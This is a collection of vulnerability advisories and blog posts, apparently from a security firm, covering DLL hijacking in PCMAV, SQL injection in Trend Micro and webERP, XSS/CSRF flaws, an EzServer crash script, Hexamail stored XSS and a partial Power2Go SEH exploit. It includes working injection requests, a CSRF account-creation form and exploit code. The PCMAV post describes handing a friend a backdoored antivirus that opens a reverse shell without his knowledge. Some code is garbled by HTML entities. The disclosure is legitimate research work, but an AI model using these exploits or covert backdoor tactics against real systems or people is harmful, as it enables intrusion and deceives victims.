PC Media Antivirus Insecure Library Loading Vulnerability

PC Media Antivirus (PCMAV) is an antivirus made by famous Indonesia computer magazine PCMedia . PCMAV is quite popular in 2006 since many virus creators in Indonesia actively spread a computer virus and infecting most computers in Indonesia. At that time some people start to claim a special anti-virus to detect Indonesia computer viruses, some of which are popular such as SmadAV, PC Media Antivirus (PCMAV), and AnsAV (edit: can’t find any official links).

Until now, PCMAV is still a popular antivirus used on most computers in Indonesia. PCMAV usually installed alongside with another popular free antivirus such as Avast, AVG, or Avira Antivir. In some companies, PCMAV is also a mainstay for detecting viruses made in Indonesia.

Antivirus is an endpoint protection to detect malicious programs from outside the computer, so the antivirus should be made with good protection, well flow design, and it should not vulnerable, thus cannot be exploited.

Proof of concept in antivirus product has been researched since a few years ago. Some well-known antivirus cannot survive and suffer from exploitation, thus bringing the risk to computer users.

This time, Spentera brought PCMAV antivirus to our garage to be tested. As a result, PCMAV suffers Insecure Library Loading vulnerability, also known as DLL Hijacking. The vulnerability works as a common DLL Hijacking technique, that an attacker can “introduce” his/her own DLL to be loaded by the vulnerable software. But in this case, it becomes more interesting. Since PCMAV made as portable, users can install PCMAV without installation, it is of course to make it easier to the users.

With the DLL Hijacking vulnerability in PCMAV, it becomes more dangerous. Since the attacker can “introduce” his/her .dll, PCMAV will automatically load the dll without confirmation. So hey, what is the problem?! I can’t get it. Well, let say you create your own DLL to execute another backdoor, listening on port with a command prompt serve you later. Very dangerous isn’t it?!

To be more clear, let us see how the action of this DLL Hijacking on PCMAV.

We can download the latest PCMAV from their website (at the time of writing, this link works and that was the current version): http://virusindonesia.com/2012/11/23/pc-media-112012-pcmav-8-4-raptor/. Now, if we analyzed using Process Monitor, PCMAV load several DLLs, but there is one interesting here.

The svrapi.dll is introduced by PCMAV itself. The svrapi.dll is a common Microsoft Common Server API Library, it is a system process that is needed to work properly. Because it is introduced by PCMAV, we can also introduce our (malicious) svrapi.dll.

Metasploit has the capability to generate malicious DLL, here is the way to create a DLL that can spawn a reverse shell to our machine.

Once created, we just simply put this malicious svrapi.dll into PCMAV’s root directory, the same path as the executable (PCMAV.EXE). Since our prep is complete, now we setup our meterpreter listener in our machine.

Our friend, Tom was asking a good antivirus to detect Ramnit. We put Tom on the test, we give him our modified PCMAV, with our DLL introduced in the root directory. When the package has been delivered to our good friend, Tom, he should be happy because he will get his computer cleaned with PCMAV antivirus. But unfortunately we change the story, Tom executed the PCMAV.EXE, and soon our svrapi.dll get loaded, and not so long, our meterpreter handler receives a connection.

We got our shell and Tom is happy because PCMAV is still scanning his system properly.

Moral of the story: DO NOT trust any files comes from external removable media, even from your trusted friend. Download it from original source (if any).

Note: Tom still doesn’t know about this.. psst..

Trend Micro Control Manager SQL Injection Vulnerability

Trend Micro Control Manager prior to version 5.5 build 1823 (English and Japanese version) and version 6 build 1449 (English version only) are susceptible to SQL Injection. The application does not properly filter user-supplied input. The successful exploitation of this vulnerability could potentially result in arbitrary SQL command input to the back-end database, such as execute SQL command to upload and execute arbitrary code against the target system.

The vulnerable parameter is ‘id’ parameter in the GET request for AdHocQuery_Processor.aspx page. According to Trend Micro Control Manager help page, an Ad Hoc Query is a direct request to the Control Manager database for information. The query uses data views to narrow the request and improve performance. After specifying the data view, users can further narrow their search by specifying filtering criteria for the request.

Version Affected

Trend Micro Control Manager 5.5 prior to (English and Japanese version)
Trend Micro Control Manager 6 prior to (English version)


An attacker with access to the Trend Micro Control Manager web interface can conduct a SQL injection attack, which could be used to result in information leakage, arbitrary code execution and/or denial of service.


The vendor has stated that these vulnerabilities have been addressed in Trend Micro Control Manager version 5.5 and 6.0 critical patches.

Critical patch available for SQL injection attacks in Control Manager (TMCM)

Control Manager 6 – Product Patch
http://downloadcenter.trendmicro.com/index.php?clk=tbl&clkval=4202 – fragment-4248

Control Manager 5.5 – Product Patch
http://downloadcenter.trendmicro.com/index.php?clk=tbl&clkval=1763 – fragment-1845

Trend Micro Control Manager 5.5 – Patch (Japanese only)
http://downloadcenter.trendmicro.com/index.php?regs=jp&clk=tbl&clkval=3432 – fragment-3462

Proof of Concept



JVN#42014489 – http://jvn.jp/en/jp/JVN42014489/index.html
VU#950795 – http://www.kb.cert.org/vuls/id/950795


webERP <=4.08.4 SQL Injection Vulnerability


webERP is a mature open-source ERP system providing best practice, multi-user business administration and accounting tools over the web. The vulnerability sits in the WO (work order) parameter, file WorkOrderEntry.php in the Manufacturing menu. Lack of input validation of the WO parameter may allow malicious users to inject an sql query.

Proof of Concept

Time-based Blind SQL Injection

POST /weberp/WorkOrderEntry.php HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: PHPSESSID=n9g1ts0s7oigk88eto8f8nm111
Content-Type: application/x-www-form-urlencoded
Content-Length: 207

FormID=ff60696dab6b35c56558628b7237a624be19ad11&amp;WO=33' AND SLEEP(5) AND '1'='1&amp;StockLocation=MEL&amp;;StartDate=14/09/2012&amp;RequiredBy=14/09/2012&amp;NumberOfOutputs=0&amp;submit=&amp;StockCat=All&amp;Keywords=&amp;StockCode=

Error-based SQL Injection

POST /weberp/WorkOrderEntry.php HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: PHPSESSID=n9g1ts0s7oigk88eto8f8nm111
Content-Type: application/x-www-form-urlencoded
Content-Length: 207



Upgrade to latest version here: http://sourceforge.net/projects/web-erp/


Trend Micro InterScan Messaging Security Suite Multiple Vulnerabilities

Trend Micro InterScan Messaging Security Suite is vulnerable to Cross-site Scripting and Cross-site Request Forgery.

Proof of Concept

The vulnerabilities POC are as follow:

Cross-site Scripting (CVE-2012-2995) (CWE-79)

Persistent/Stored XSS
Non-persistent/Reflected XSS
Cross-Site Request Forgery (CVE-2012-2996) (CWE-352)
&lt;form action="hxxps://" method="POST"&gt;
&lt;input type="hidden" name="enabled" value="on" /&gt;
&lt;input type="hidden" name="authMethod" value="1" /&gt;
&lt;input type="hidden" name="name" value="quorra" /&gt;
&lt;input type="hidden" name="password" value="quorra.123" /&gt;
&lt;input type="hidden" name="confirmPwd" value="quorra.123" /&gt;
&lt;input type="hidden" name="tabAction" value="saveAuth" /&gt;
&lt;input type="hidden" name="gotoTab" value="saveAll" /&gt;
&lt;input type="submit" value="CSRF" /&gt;


Currently, we are not aware of any vendor solution. You may contact the vendor for patch or update of the product.
As a temporary solution, you may restrict access to this application to prevent unauthorized user make use of this vulnerability.




Proxychains on OSX Mountain Lion


Link below is not working anymore. To install Proxychains, you can install it directly using brew

infidel:~ goo$ brew install proxychains-ng

Here is the step-by-step solution to get it works:

Setup a working directory, I’m using ~/build-temp/

infidel:~ goo$ mkdir build-temp
infidel:~ goo$ cd build-temp

Download Proxychains from here (you may using wget or via the browser) and extract

infidel:build-temp goo$ tar xzvf proxychains-3.1.tar.gz

Download the patch file for Proxychains here (thanks to chrootlabs guy)

infidel:build-temp goo$ wget http://chrootlabs.org/bgt/proxychains-3.1_osx.diff

Patch the Proxychains

infidel:build-temp goo$ patch -p1 &lt;proxychains-3.1_osx.diff

Install the Proxychains

infidel:build-temp goo$ cd proxychains-3.1
infidel:proxychains-3.1 goo$ ./configure --PREFIX=/opt/local
infidel:proxychains-3.1 goo$ cd proxychains
infidel:proxychains goo$ make
infidel:proxychains goo$ sudo make install

Create symbolic links to make it run from anywhere

infidel:proxychains goo$ mkdir ~/.libs
infidel:proxychains goo$ mkdir ~/.proxychains
infidel:proxychains goo$ ln -s /opt/local/lib/libproxychains.3.0.0.dylib ~/.libs/
infidel:proxychains goo$ ln -s /opt/local/etc/proxychains.conf ~/.proxychains/

Now comment out the proxy_dns option in proxychains.conf file (this causes trouble)

infidel:proxychains goo$ sudo nano ~/.proxychains/proxychains.conf

Proxychains should works now, you may test it using lynx

infidel:~ goo$ proxychains lynx ipchicken.com

source: http://touhou.ru/?act=showpost&pid=511

Ezhometech Ezserver <=6.4.017 Stack Buffer Overflow Vulnerability

EZserver version 6.4.017 or below contains a buffer overflow vulnerability which may possibly be exploited to cause a denial of service or arbitrary code execution.

Vulnerability Details

Buffer overflow condition exist in URL handling, sending long GET request to the server on port 8000
will cause server process to exit and may allow malicious code injection.
Further research found that the application does not care about the HTTP method,
so that by sending long characters to the port 8000 will make the program crash.

Vendor logs

06/11/2012 – Bug found
06/12/2012 – Vendor contacted
06/16/2012 – No response, advisory released.

Proof of Concept


from socket import *
import sys

if len(sys.argv) != 3:
print "[*] Proof of Concept of Ezserver &lt;=6.4.017 Buffer Overflow&quot;
print &quot;[*] by Spentera Research - research[at]spentera[dot]com&quot;
print &quot;[*] http://www.spentera.com/resources/security-advisory\n&quot;
print &quot;[*] Usage: python %s ip port&quot; %sys.argv[0]

host = sys.argv[1]
port = int(sys.argv[2])

junk = &quot;\x41&quot; * 10000
payload = junk

print &quot;[!] Connecting to %s on port %d&quot; % (host,port)
s = socket(AF_INET, SOCK_STREAM)

print &quot;[+] Launching attack..&quot;
s.send (&quot;GET /&quot; + payload + &quot;HTTP/1.0\r\n\r\n\r\n&quot;)
print &quot;[x] Could not connect to the server x_x&quot;

Working Exploit



Exploit Database: http://www.exploit-db.com/exploits/19266/
Metasploit: http://www.metasploit.com/modules/exploit/windows/http/ezserver_http

Hexamail Server <= 4.4.5 Persistent XSS Vulnerability

Hexamail Server version 4.4.5 or below is vulnerable to a persistent cross-site scripting (XSS) via HTML email.

<Vulnerability Description

Hexamail Server suffers persistent XSS vulnerability in the mail body, allowing malicious user to execute scripts in a victim’s browser to hijack user sessions, redirect users, and or hijack the user’s browser.

Proof of concep

By sending a malicious script to the victim email, the webmail automatically load the mail body, so the script will be automatically executed without permission from user.

root@bt:~/# cat &#x3E; meal.txt
&#x3C;h1&#x3E;XSS pop up&#x3C;/h1&#x3E;
&#x3C;script&#x3E;alert(&#x27;Hi, what is this?&#x27;);&#x3C;/script&#x3E;

Send email to the victim:

root@bt:~/# sendemail -f bob@example.com -t david@example.com -xu bob@example.com -xp bob123 -u "Want some meal..?" -o message-file=meal.txt -s mail.example.com

Vendor timeline

04/20/2012 – Issue discovered
04/20/2012 – Vendor contacted
04/27/2012 – Vendor respond and provides new upgrade version
04/30/2012 – Issue still affected on the latest upgrade version
04/30/2012 – Vendor said they still fixing the problem
05/10/2012 – Email sent to ask about the fix progress
06/02/2012 – No response. Sent to Secunia.


Not available.

CyberLink Power2Go Unicode Stack Buffer Overflow

The proof of concept of the vulnerability has been released on December 9, 2011, and no further announcement from CyberLink. I tried to coordinate the issue until they didn’t contact me anymore. A week after our last email, they updated the product, and  yes it’s Power2Go 8. How do they know that the product is safe without letting me to check again?

The application itself is still vulnerable to stack buffer overflow as we posted earlier here. This morning, a good friend from Metasploitmr_me, sent me an email and asking why I didn’t get a shell from this PoC. He also attached his working exploit script, and working flawlessly on Windows 7, awesome!

I stated him that I already managed to get a shell on Power2Go 7 (build 196), but can’t find any reliable jump address on Power2Go 8, because it’s a unicode stack overflow and obviously you will face a very limited address regarding of JMP or RET address. He submitted his working exploit to Metasploit exploit dev team so it will be added to Metasploit soon.

So, here is the POC for Power2Go 7 (build 196):


# badchars: all above "\x7F" will be converted to "\xFF",
# even the "\xFF" itself is marked as badchar.
import time
filename = "overflow-power2go-7.p2g"

header = (

body = (

unicode_nop = "\x6f"

junk = "A" * 778
nseh = "\x61\x6f"
#seh = "\x3e\x42"	# 0x0042003e : pop esi # pop ecx # ret 08 # Power2Go.exe
seh = "\x39\x20\x50"	# 0x00450165 : pop edi # pop esi # ret # Power2Go.exe

alignment = "\x54"  # PUSH ESP
alignment += unicode_nop
alignment += "\x58"  # POP EAX
alignment += unicode_nop
alignment += "\x05\x12\x11"  # ADD EAX,11001200
alignment += unicode_nop
alignment += "\x2d\x01\x01"  # SUB EAX,1000100
alignment += unicode_nop
alignment += "\x2d\x01\x10"  # SUB EAX,10000100
alignment += unicode_nop

# space is not an issue, we have a lot of space.
walk = "\x73" * 728    # we just walk until we meet the shellcode


sisa =  "\x42" * (8000 - len(junk+nseh+seh+alignment+walk+sc))

hell = "\x3c\x46\x69\x6c\x65" + "\r\n"	# &lt;File
hell+= &quot;name=&quot; + &#039;&quot;&#039;+ junk+nseh+seh+alignment+walk+sc+sisa + &#039;&quot;&#039;

print &quot;CyberLink Power2Go &lt;= File Project Processing (.p2g) Buffer Overflow (0day)&quot;
print &quot;[*] by modpr0be &quot;
print &quot;[*] Preparing the file..&quot;
f = open(filename,&#039;w&#039;)
	f.write(header+ &quot;\r\n&quot; + hell + &quot;\r\n&quot; + body)
	print &quot;[+] File&quot;, filename, &quot;successfully created!&quot;
	print &quot;[*] Please open&quot;, filename, &quot;with CyberLink Power2Go.&quot;
	print &quot;[*] After that, telnet to target on port 4444.&quot;
except IOError:
	print &quot;[-] Could not write to destination folder, check permission..&quot;

Looking for Power2Go 8 exploit? Wait until mr_me's pull request is accepted by the Metasploit team, it will automatically push to your Metasploit as well 🙂
We don't have any information if the vulnerability is being exploited.